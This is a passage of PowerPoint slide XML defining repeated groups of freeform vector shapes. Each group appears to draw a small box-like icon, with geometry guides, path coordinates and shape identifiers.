                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DB116FDD-18A4-48ED-B298-2EAC63A7709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4" y="896"/>
                        <a:ext cx="48" cy="550"/>
                      </a:xfrm>
                      <a:custGeom>
                        <a:avLst/>
                        <a:gdLst>
                          <a:gd name="T0" fmla="*/ 0 w 16"/>
                          <a:gd name="T1" fmla="*/ 0 h 183"/>
                          <a:gd name="T2" fmla="*/ 0 w 16"/>
                          <a:gd name="T3" fmla="*/ 180 h 183"/>
                          <a:gd name="T4" fmla="*/ 16 w 16"/>
                          <a:gd name="T5" fmla="*/ 183 h 183"/>
                          <a:gd name="T6" fmla="*/ 16 w 16"/>
                          <a:gd name="T7" fmla="*/ 3 h 183"/>
                          <a:gd name="T8" fmla="*/ 0 w 16"/>
                          <a:gd name="T9" fmla="*/ 0 h 18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6" h="183">
                            <a:moveTo>
                              <a:pt x="0" y="0"/>
                            </a:moveTo>
                            <a:lnTo>
                              <a:pt x="0" y="180"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="16" y="183"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="16" y="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689" name="Group 174">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B211BFCB-6E20-407F-BDB5-7C424D59640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758" y="2390"/>
                      <a:ext cx="137" cy="174"/>
                      <a:chOff x="2343" y="728"/>
                      <a:chExt cx="569" cy="718"/>
                    </a:xfrm>
                  </p:grpSpPr>
                  <p:sp>
                    <p:nvSpPr>
                      <p:cNvPr id="1722" name="Freeform 175">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5F932646-1EDB-4434-8A5E-4FCD31DDA79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3" y="728"/>
                        <a:ext cx="569" cy="180"/>
                      </a:xfrm>
                      <a:custGeom>
                        <a:avLst/>
                        <a:gdLst>
                          <a:gd name="T0" fmla="*/ 0 w 569"/>
                          <a:gd name="T1" fmla="*/ 112 h 180"/>
                          <a:gd name="T2" fmla="*/ 422 w 569"/>
                          <a:gd name="T3" fmla="*/ 0 h 180"/>
                          <a:gd name="T4" fmla="*/ 569 w 569"/>
                          <a:gd name="T5" fmla="*/ 39 h 180"/>
                          <a:gd name="T6" fmla="*/ 49 w 569"/>
                          <a:gd name="T7" fmla="*/ 180 h 180"/>
                          <a:gd name="T8" fmla="*/ 0 w 569"/>
                          <a:gd name="T9" fmla="*/ 168 h 180"/>
                          <a:gd name="T10" fmla="*/ 0 w 569"/>
                          <a:gd name="T11" fmla="*/ 112 h 18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569" h="180">
                            <a:moveTo>
                              <a:pt x="0" y="112"/>
                            </a:moveTo>
                            <a:lnTo>
                              <a:pt x="422" y="0"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="569" y="39"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="49" y="180"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="0" y="168"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="0" y="112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3" name="Freeform 176">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{14F3F79D-DE8C-467A-B901-9B580152698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92" y="767"/>
                        <a:ext cx="520" cy="679"/>
                      </a:xfrm>
                      <a:custGeom>
                        <a:avLst/>
                        <a:gdLst>
                          <a:gd name="T0" fmla="*/ 0 w 453"/>
                          <a:gd name="T1" fmla="*/ 589 h 589"/>
                          <a:gd name="T2" fmla="*/ 0 w 453"/>
                          <a:gd name="T3" fmla="*/ 121 h 589"/>
                          <a:gd name="T4" fmla="*/ 453 w 453"/>
                          <a:gd name="T5" fmla="*/ 0 h 589"/>
                          <a:gd name="T6" fmla="*/ 453 w 453"/>
                          <a:gd name="T7" fmla="*/ 468 h 589"/>
                          <a:gd name="T8" fmla="*/ 0 w 453"/>
                          <a:gd name="T9" fmla="*/ 589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3" h="589">
                            <a:moveTo>
                              <a:pt x="0" y="589"/>
                            </a:moveTo>
                            <a:lnTo>
                              <a:pt x="0" y="121"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="453" y="0"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="453" y="468"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="0" y="589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4" name="Freeform 177">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8D3FFB6C-40D0-4C8A-9FB4-44EB52C75E0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4" y="896"/>
                        <a:ext cx="48" cy="550"/>
                      </a:xfrm>
                      <a:custGeom>
                        <a:avLst/>
                        <a:gdLst>
                          <a:gd name="T0" fmla="*/ 0 w 16"/>
                          <a:gd name="T1" fmla="*/ 0 h 183"/>
                          <a:gd name="T2" fmla="*/ 0 w 16"/>
                          <a:gd name="T3" fmla="*/ 180 h 183"/>
                          <a:gd name="T4" fmla="*/ 16 w 16"/>
                          <a:gd name="T5" fmla="*/ 183 h 183"/>
                          <a:gd name="T6" fmla="*/ 16 w 16"/>
                          <a:gd name="T7" fmla="*/ 3 h 183"/>
                          <a:gd name="T8" fmla="*/ 0 w 16"/>
                          <a:gd name="T9" fmla="*/ 0 h 18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6" h="183">
                            <a:moveTo>
                              <a:pt x="0" y="0"/>
                            </a:moveTo>
                            <a:lnTo>
                              <a:pt x="0" y="180"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="16" y="183"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="16" y="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690" name="Group 178">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FDFC60B8-78F8-46B0-8B6F-FE2D6CC4148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972" y="1877"/>
                      <a:ext cx="137" cy="174"/>
                      <a:chOff x="2343" y="728"/>
                      <a:chExt cx="569" cy="718"/>
                    </a:xfrm>
                  </p:grpSpPr>
                  <p:sp>
                    <p:nvSpPr>
                      <p:cNvPr id="1719" name="Freeform 179">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DDE8F0A7-2498-4A14-A532-B94260691DA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3" y="728"/>
                        <a:ext cx="569" cy="180"/>
                      </a:xfrm>
                      <a:custGeom>
                        <a:avLst/>
                        <a:gdLst>
                          <a:gd name="T0" fmla="*/ 0 w 569"/>
                          <a:gd name="T1" fmla="*/ 112 h 180"/>
                          <a:gd name="T2" fmla="*/ 422 w 569"/>
                          <a:gd name="T3" fmla="*/ 0 h 180"/>
                          <a:gd name="T4" fmla="*/ 569 w 569"/>
                          <a:gd name="T5" fmla="*/ 39 h 180"/>
                          <a:gd name="T6" fmla="*/ 49 w 569"/>
                          <a:gd name="T7" fmla="*/ 180 h 180"/>
                          <a:gd name="T8" fmla="*/ 0 w 569"/>
                          <a:gd name="T9" fmla="*/ 168 h 180"/>
                          <a:gd name="T10" fmla="*/ 0 w 569"/>
                          <a:gd name="T11" fmla="*/ 112 h 18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569" h="180">
                            <a:moveTo>
                              <a:pt x="0" y="112"/>
                            </a:moveTo>
                            <a:lnTo>
                              <a:pt x="422" y="0"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="569" y="39"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="49" y="180"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="0" y="168"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="0" y="112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0" name="Freeform 180">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{771E6D69-FDF3-4600-90AE-D32EEAC98ED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92" y="767"/>
                        <a:ext cx="520" cy="679"/>
                      </a:xfrm>
                      <a:custGeom>
                        <a:avLst/>
                        <a:gdLst>
                          <a:gd name="T0" fmla="*/ 0 w 453"/>
                          <a:gd name="T1" fmla="*/ 589 h 589"/>
                          <a:gd name="T2" fmla="*/ 0 w 453"/>
                          <a:gd name="T3" fmla="*/ 121 h 589"/>
                          <a:gd name="T4" fmla="*/ 453 w 453"/>
                          <a:gd name="T5" fmla="*/ 0 h 589"/>
                          <a:gd name="T6" fmla="*/ 453 w 453"/>
                          <a:gd name="T7" fmla="*/ 468 h 589"/>
                          <a:gd name="T8" fmla="*/ 0 w 453"/>
                          <a:gd name="T9" fmla="*/ 589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3" h="589">
                            <a:moveTo>
                              <a:pt x="0" y="589"/>
                            </a:moveTo>
                            <a:lnTo>
                              <a:pt x="0" y="121"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="453" y="0"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="453" y="468"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="0" y="589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1" name="Freeform 181">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9BCEBE6D-E95A-48F1-9DA5-EBFF2389B8F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4" y="896"/>
                        <a:ext cx="48" cy="550"/>
                      </a:xfrm>
                      <a:custGeom>
                        <a:avLst/>
                        <a:gdLst>
                          <a:gd name="T0" fmla="*/ 0 w 16"/>
                          <a:gd name="T1" fmla="*/ 0 h 183"/>
                          <a:gd name="T2" fmla="*/ 0 w 16"/>
                          <a:gd name="T3" fmla="*/ 180 h 183"/>
                          <a:gd name="T4" fmla="*/ 16 w 16"/>
                          <a:gd name="T5" fmla="*/ 183 h 183"/>
                          <a:gd name="T6" fmla="*/ 16 w 16"/>
                          <a:gd name="T7" fmla="*/ 3 h 183"/>
                          <a:gd name="T8" fmla="*/ 0 w 16"/>
                          <a:gd name="T9" fmla="*/ 0 h 18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6" h="183">
                            <a:moveTo>
                              <a:pt x="0" y="0"/>
                            </a:moveTo>
                            <a:lnTo>
                              <a:pt x="0" y="180"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="16" y="183"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="16" y="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691" name="Group 182">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9127336B-9FF7-4202-8975-4DFC4413751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319" y="2281"/>
                      <a:ext cx="137" cy="174"/>
                      <a:chOff x="2343" y="728"/>
                      <a:chExt cx="569" cy="718"/>
                    </a:xfrm>
                  </p:grpSpPr>
                  <p:sp>
                    <p:nvSpPr>
                      <p:cNvPr id="1716" name="Freeform 183">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{63EFB5EB-9A7A-485F-BB64-256E7254959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3" y="728"/>
                        <a:ext cx="569" cy="180"/>
                      </a:xfrm>
                      <a:custGeom>
                        <a:avLst/>
                        <a:gdLst>
                          <a:gd name="T0" fmla="*/ 0 w 569"/>
                          <a:gd name="T1" fmla="*/ 112 h 180"/>
                          <a:gd name="T2" fmla="*/ 422 w 569"/>
                          <a:gd name="T3" fmla="*/ 0 h 180"/>
                          <a:gd name="T4" fmla="*/ 569 w 569"/>
                          <a:gd name="T5" fmla="*/ 39 h 180"/>
                          <a:gd name="T6" fmla="*/ 49 w 569"/>
                          <a:gd name="T7" fmla="*/ 180 h 180"/>
                          <a:gd name="T8" fmla="*/ 0 w 569"/>
                          <a:gd name="T9" fmla="*/ 168 h 180"/>
                          <a:gd name="T10" fmla="*/ 0 w 569"/>
                          <a:gd name="T11" fmla="*/ 112 h 18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569" h="180">
                            <a:moveTo>
                              <a:pt x="0" y="112"/>
                            </a:moveTo>
                            <a:lnTo>
                              <a:pt x="422" y="0"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="569" y="39"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="49" y="180"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="0" y="168"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="0" y="112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17" name="Freeform 184">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3BACCCF6-40F8-47CD-AC43-6EA917B77FB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92" y="767"/>
                        <a:ext cx="520" cy="679"/>
                      </a:xfrm>
                      <a:custGeom>
                        <a:avLst/>
                        <a:gdLst>
                          <a:gd name="T0" fmla="*/ 0 w 453"/>
                          <a:gd name="T1" fmla="*/ 589 h 589"/>
                          <a:gd name="T2" fmla="*/ 0 w 453"/>
                          <a:gd name="T3" fmla="*/ 121 h 589"/>
                          <a:gd name="T4" fmla="*/ 453 w 453"/>
                          <a:gd name="T5" fmla="*/ 0 h 589"/>
                          <a:gd name="T6" fmla="*/ 453 w 453"/>
                          <a:gd name="T7" fmla="*/ 468 h 589"/>
                          <a:gd name="T8" fmla="*/ 0 w 453"/>
                          <a:gd name="T9" fmla="*/ 589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3" h="589">
                            <a:moveTo>
                              <a:pt x="0" y="589"/>
                            </a:moveTo>
                            <a:lnTo>
                              <a:pt x="0" y="121"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="453" y="0"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="453" y="468"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="0" y="589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18" name="Freeform 185">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2E42F43B-F28D-4AF4-B059-DB04EBC37E4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4" y="896"/>
                        <a:ext cx="48" cy="550"/>
                      </a:xfrm>
                      <a:custGeom>
                        <a:avLst/>
                        <a:gdLst>
                          <a:gd name="T0" fmla="*/ 0 w 16"/>
                          <a:gd name="T1" fmla="*/ 0 h 183"/>
                          <a:gd name="T2" fmla="*/ 0 w 16"/>
                          <a:gd name="T3" fmla="*/ 180 h 183"/>
                          <a:gd name="T4" fmla="*/ 16 w 16"/>
                          <a:gd name="T5" fmla="*/ 183 h 183"/>
                          <a:gd name="T6" fmla="*/ 16 w 16"/>
                          <a:gd name="T7" fmla="*/ 3 h 183"/>
                          <a:gd name="T8" fmla="*/ 0 w 16"/>
                          <a:gd name="T9" fmla="*/ 0 h 18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6" h="183">
                            <a:moveTo>
                              <a:pt x="0" y="0"/>
                            </a:moveTo>
                            <a:lnTo>
                              <a:pt x="0" y="180"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="16" y="183"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="16" y="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692" name="Group 186">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CF67ED8D-B8C6-447F-8F19-9B79E5766EC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542" y="1998"/>
                      <a:ext cx="137" cy="174"/>
                      <a:chOff x="2343" y="728"/>
                      <a:chExt cx="569" cy="718"/>
                    </a:xfrm>
                  </p:grpSpPr>
                  <p:sp>
                    <p:nvSpPr>
                      <p:cNvPr id="1713" name="Freeform 187">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{89B90FFB-1BC7-4963-A431-775E1EFDA21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3" y="728"/>
                        <a:ext cx="569" cy="180"/>
                      </a:xfrm>
                      <a:custGeom>
                        <a:avLst/>
                        <a:gdLst>
                          <a:gd name="T0" fmla="*/ 0 w 569"/>
                          <a:gd name="T1" fmla="*/ 112 h 180"/>
                          <a:gd name="T2" fmla="*/ 422 w 569"/>
                          <a:gd name="T3" fmla="*/ 0 h 180"/>
                          <a:gd name="T4" fmla="*/ 569 w 569"/>
                          <a:gd name="T5" fmla="*/ 39 h 180"/>
                          <a:gd name="T6" fmla="*/ 49 w 569"/>
                          <a:gd name="T7" fmla="*/ 180 h 180"/>
                          <a:gd name="T8" fmla="*/ 0 w 569"/>
                          <a:gd name="T9" fmla="*/ 168 h 180"/>
                          <a:gd name="T10" fmla="*/ 0 w 569"/>
                          <a:gd name="T11" fmla="*/ 112 h 18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569" h="180">
                            <a:moveTo>
                              <a:pt x="0" y="112"/>
                            </a:moveTo>
                            <a:lnTo>
                              <a:pt x="422" y="0"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="569" y="39"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="49" y="180"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="0" y="168"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="0" y="112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14" name="Freeform 188">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{711E9BEB-C740-4298-B02D-93B53F245EE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92" y="767"/>
                        <a:ext cx="520" cy="679"/>
                      </a:xfrm>
                      <a:custGeom>
                        <a:avLst/>
                        <a:gdLst>
                          <a:gd name="T0" fmla="*/ 0 w 453"/>
                          <a:gd name="T1" fmla="*/ 589 h 589"/>
                          <a:gd name="T2" fmla="*/ 0 w 453"/>
                          <a:gd name="T3" fmla="*/ 121 h 589"/>
                          <a:gd name="T4" fmla="*/ 453 w 453"/>
                          <a:gd name="T5" fmla="*/ 0 h 589"/>
                          <a:gd name="T6" fmla="*/ 453 w 453"/>
                          <a:gd name="T7" fmla="*/ 468 h 589"/>
                          <a:gd name="T8" fmla="*/ 0 w 453"/>
                          <a:gd name="T9" fmla="*/ 589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3" h="589">
                            <a:moveTo>
                              <a:pt x="0" y="589"/>
                            </a:moveTo>
                            <a:lnTo>
                              <a:pt x="0" y="121"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="453" y="0"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="453" y="468"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="0" y="589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15" name="Freeform 189">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{25598607-3CB0-4E55-BF84-433A3FAC713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4" y="896"/>
                        <a:ext cx="48" cy="550"/>
                      </a:xfrm>
                      <a:custGeom>
                        <a:avLst/>
                        <a:gdLst>
                          <a:gd name="T0" fmla="*/ 0 w 16"/>
                          <a:gd name="T1" fmla="*/ 0 h 183"/>
                          <a:gd name="T2" fmla="*/ 0 w 16"/>
                          <a:gd name="T3" fmla="*/ 180 h 183"/>
                          <a:gd name="T4" fmla="*/ 16 w 16"/>
                          <a:gd name="T5" fmla="*/ 183 h 183"/>
                          <a:gd name="T6" fmla="*/ 16 w 16"/>
                          <a:gd name="T7" fmla="*/ 3 h 183"/>
                          <a:gd name="T8" fmla="*/ 0 w 16"/>
                          <a:gd name="T9" fmla="*/ 0 h 18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6" h="183">
                            <a:moveTo>
                              <a:pt x="0" y="0"/>
                            </a:moveTo>
                            <a:lnTo>
                              <a:pt x="0" y="180"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="16" y="183"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="16" y="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693" name="Group 190">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{03DA4F13-AC6D-4751-8BE6-86914A9767D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758" y="1936"/>
                      <a:ext cx="137" cy="174"/>
                      <a:chOff x="2343" y="728"/>
                      <a:chExt cx="569" cy="718"/>
                    </a:xfrm>
                  </p:grpSpPr>
                  <p:sp>
                    <p:nvSpPr>
                      <p:cNvPr id="1710" name="Freeform 191">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B3F879E7-B472-4578-8A3B-662E3180009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3" y="728"/>
                        <a:ext cx="569" cy="180"/>
                      </a:xfrm>
                      <a:custGeom>
                        <a:avLst/>
                        <a:gdLst>
                          <a:gd name="T0" fmla="*/ 0 w 569"/>
                          <a:gd name="T1" fmla="*/ 112 h 180"/>
                          <a:gd name="T2" fmla="*/ 422 w 569"/>
                          <a:gd name="T3" fmla="*/ 0 h 180"/>
                          <a:gd name="T4" fmla="*/ 569 w 569"/>
                          <a:gd name="T5" fmla="*/ 39 h 180"/>
                          <a:gd name="T6" fmla="*/ 49 w 569"/>
                          <a:gd name="T7" fmla="*/ 180 h 180"/>
                          <a:gd name="T8" fmla="*/ 0 w 569"/>
                          <a:gd name="T9" fmla="*/ 168 h 180"/>
                          <a:gd name="T10" fmla="*/ 0 w 569"/>
                          <a:gd name="T11" fmla="*/ 112 h 18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569" h="180">
                            <a:moveTo>
                              <a:pt x="0" y="112"/>
                            </a:moveTo>
                            <a:lnTo>
                              <a:pt x="422" y="0"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="569" y="39"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="49" y="180"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="0" y="168"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="0" y="112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11" name="Freeform 192">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{536BD1AA-75B4-4A77-BF92-BCA3BB0744E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92" y="767"/>
                        <a:ext cx="520" cy="679"/>
                      </a:xfrm>
                      <a:custGeom>
                        <a:avLst/>
                        <a:gdLst>
                          <a:gd name="T0" fmla="*/ 0 w 453"/>
                          <a:gd name="T1" fmla="*/ 589 h 589"/>
                          <a:gd name="T2" fmla="*/ 0 w 453"/>
                          <a:gd name="T3" fmla="*/ 121 h 589"/>
                          <a:gd name="T4" fmla="*/ 453 w 453"/>
                          <a:gd name="T5" fmla="*/ 0 h 589"/>
                          <a:gd name="T6" fmla="*/ 453 w 453"/>
                          <a:gd name="T7" fmla="*/ 468 h 589"/>
                          <a:gd name="T8" fmla="*/ 0 w 453"/>
                          <a:gd name="T9" fmla="*/ 589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3" h="589">
                            <a:moveTo>
                              <a:pt x="0" y="589"/>
                            </a:moveTo>
                            <a:lnTo>
                              <a:pt x="0" y="121"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="453" y="0"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="453" y="468"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="0" y="589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12" name="Freeform 193">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{78C46D3D-A281-4697-BA73-BD5AEAF54BA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4" y="896"/>
                        <a:ext cx="48" cy="550"/>
                      </a:xfrm>
                      <a:custGeom>
                        <a:avLst/>
                        <a:gdLst>
                          <a:gd name="T0" fmla="*/ 0 w 16"/>
                          <a:gd name="T1" fmla="*/ 0 h 183"/>
                          <a:gd name="T2" fmla="*/ 0 w 16"/>
                          <a:gd name="T3" fmla="*/ 180 h 183"/>
                          <a:gd name="T4" fmla="*/ 16 w 16"/>
                          <a:gd name="T5" fmla="*/ 183 h 183"/>
                          <a:gd name="T6" fmla="*/ 16 w 16"/>
                          <a:gd name="T7" fmla="*/ 3 h 183"/>
                          <a:gd name="T8" fmla="*/ 0 w 16"/>
                          <a:gd name="T9" fmla="*/ 0 h 18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6" h="183">
                            <a:moveTo>
                              <a:pt x="0" y="0"/>
                            </a:moveTo>
                            <a:lnTo>
                              <a:pt x="0" y="180"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="16" y="183"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="16" y="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694" name="Group 194">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C789E834-BD1C-43FB-A1B5-6CF2C72069A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324" y="2055"/>
                      <a:ext cx="137" cy="174"/>
                      <a:chOff x="2343" y="728"/>
                      <a:chExt cx="569" cy="718"/>
                    </a:xfrm>
                  </p:grpSpPr>
                  <p:sp>
                    <p:nvSpPr>
                      <p:cNvPr id="1707" name="Freeform 195">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B3E0AF85-A637-4CF9-8C41-5C62CD87121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3" y="728"/>
                        <a:ext cx="569" cy="180"/>
                      </a:xfrm>
                      <a:custGeom>
                        <a:avLst/>
                        <a:gdLst>
                          <a:gd name="T0" fmla="*/ 0 w 569"/>
                          <a:gd name="T1" fmla="*/ 112 h 180"/>
                          <a:gd name="T2" fmla="*/ 422 w 569"/>
                          <a:gd name="T3" fmla="*/ 0 h 180"/>
                          <a:gd name="T4" fmla="*/ 569 w 569"/>
                          <a:gd name="T5" fmla="*/ 39 h 180"/>
                          <a:gd name="T6" fmla="*/ 49 w 569"/>
                          <a:gd name="T7" fmla="*/ 180 h 180"/>
                          <a:gd name="T8" fmla="*/ 0 w 569"/>
                          <a:gd name="T9" fmla="*/ 168 h 180"/>
                          <a:gd name="T10" fmla="*/ 0 w 569"/>
                          <a:gd name="T11" fmla="*/ 112 h 18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569" h="180">
                            <a:moveTo>
                              <a:pt x="0" y="112"/>
                            </a:moveTo>
                            <a:lnTo>
                              <a:pt x="422" y="0"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="569" y="39"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="49" y="180"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="0" y="168"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="0" y="112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08" name="Freeform 196">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{06A3E11E-3303-474D-ABD5-D944DB9E2F2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92" y="767"/>
                        <a:ext cx="520" cy="679"/>
                      </a:xfrm>
                      <a:custGeom>
                        <a:avLst/>
                        <a:gdLst>
                          <a:gd name="T0" fmla="*/ 0 w 453"/>
                          <a:gd name="T1" fmla="*/ 589 h 589"/>
                          <a:gd name="T2" fmla="*/ 0 w 453"/>
                          <a:gd name="T3" fmla="*/ 121 h 589"/>
                          <a:gd name="T4" fmla="*/ 453 w 453"/>
                          <a:gd name="T5" fmla="*/ 0 h 589"/>
                          <a:gd name="T6" fmla="*/ 453 w 453"/>
                          <a:gd name="T7" fmla="*/ 468 h 589"/>
                          <a:gd name="T8" fmla="*/ 0 w 453"/>
                          <a:gd name="T9" fmla="*/ 589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3" h="589">
                            <a:moveTo>
                              <a:pt x="0" y="589"/>
                            </a:moveTo>
                            <a:lnTo>
                              <a:pt x="0" y="121"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="453" y="0"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="453" y="468"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="0" y="589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09" name="Freeform 197">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{466E344C-5EFF-43D8-8802-91F64327A7E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4" y="896"/>
                        <a:ext cx="48" cy="550"/>
                      </a:xfrm>
                      <a:custGeom>
                        <a:avLst/>
                        <a:gdLst>
                          <a:gd name="T0" fmla="*/ 0 w 16"/>
                          <a:gd name="T1" fmla="*/ 0 h 183"/>
                          <a:gd name="T2" fmla="*/ 0 w 16"/>
                          <a:gd name="T3" fmla="*/ 180 h 183"/>
                          <a:gd name="T4" fmla="*/ 16 w 16"/>
                          <a:gd name="T5" fmla="*/ 183 h 183"/>
                          <a:gd name="T6" fmla="*/ 16 w 16"/>
                          <a:gd name="T7" fmla="*/ 3 h 183"/>
                          <a:gd name="T8" fmla="*/ 0 w 16"/>
                          <a:gd name="T9" fmla="*/ 0 h 18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6" h="183">
                            <a:moveTo>
                              <a:pt x="0" y="0"/>
                            </a:moveTo>
                            <a:lnTo>
                              <a:pt x="0" y="180"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="16" y="183"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="16" y="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695" name="Group 198">
                      <a:extLst>
